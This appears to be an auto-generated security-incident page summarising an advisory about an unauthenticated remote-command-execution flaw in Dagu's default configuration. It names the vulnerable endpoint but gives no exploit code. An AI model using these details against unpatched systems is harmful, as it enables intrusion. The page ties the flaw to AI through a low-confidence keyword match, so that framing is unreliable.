ASR AI Security Radar

Back to incidents

AI security incident: Dagu affected by unauthenticated RCE via inline DAG spec in default configuration (GH...

Incident date: February 19, 2026 | Published: February 25, 2026 | Source: GitHub Security Advisory | Classification confidence: 45%

This incident is part of the public archive and includes explicit AI-related signals from the cited source material. Review methodology.

Summary Dagu's default configuration ships with authentication completely disabled. The POST /api/v2/dag-runs endpoint accepts an inline YAML spec and executes its shell commands immediately — no credentials, no token, nothing. Any dagu instance reachable over the network is fully compromised by default. A second issue means that even with auth properly configured, operator-role users can still execute arbitrary commands by submitting inline specs through the same endpoint. ### Details **Finding 1 — Unauthenticated RCE (default config)** internal/service/app/config/loader.go:226 sets AuthModeNone as the default. With no auth mode configured, internal/frontend/api/v2/handlers/api.

Why This Is AI-Related

This page is treated as AI-specific because the source material references copilot, which places the issue inside an AI workflow, model, assistant, or supporting dependency rather than a generic software bulletin.

  • copilot

Affected Workflow

Review AI plugins, copilots, model-serving helpers, CLI tools, and automation runtimes that execute system commands.

Likely Attack Path

An attacker can turn the vulnerable AI-adjacent component into a path for command execution on the host or service runtime.

Impact

The issue can create a path to command execution inside an AI-facing product, plugin, copilot, or supporting service runtime. Severity HIGH. Classification confidence 45%. Source channel GHSA.

Detection And Triage Signals

  • New shell or process activity from AI-facing services
  • Unexpected outbound connections or file writes after prompt or API activity
  • Privilege changes, container escapes, or suspicious job execution logs

Recommended Response

  • Identify every environment that runs the affected AI plugin, assistant, CLI, or supporting package.
  • Patch or isolate the vulnerable component and remove risky execution permissions while validation is in progress.
  • Review process execution, outbound connections, and file-write logs for signs of post-exploitation activity.

Compliance And Business Impact

Code execution paths create immediate risk of host compromise, credential theft, and downstream lateral movement.

Sources

Want alerts like this in real time?

Get notified with incident context, likely impact, and response guidance.

Get Notified

More incidents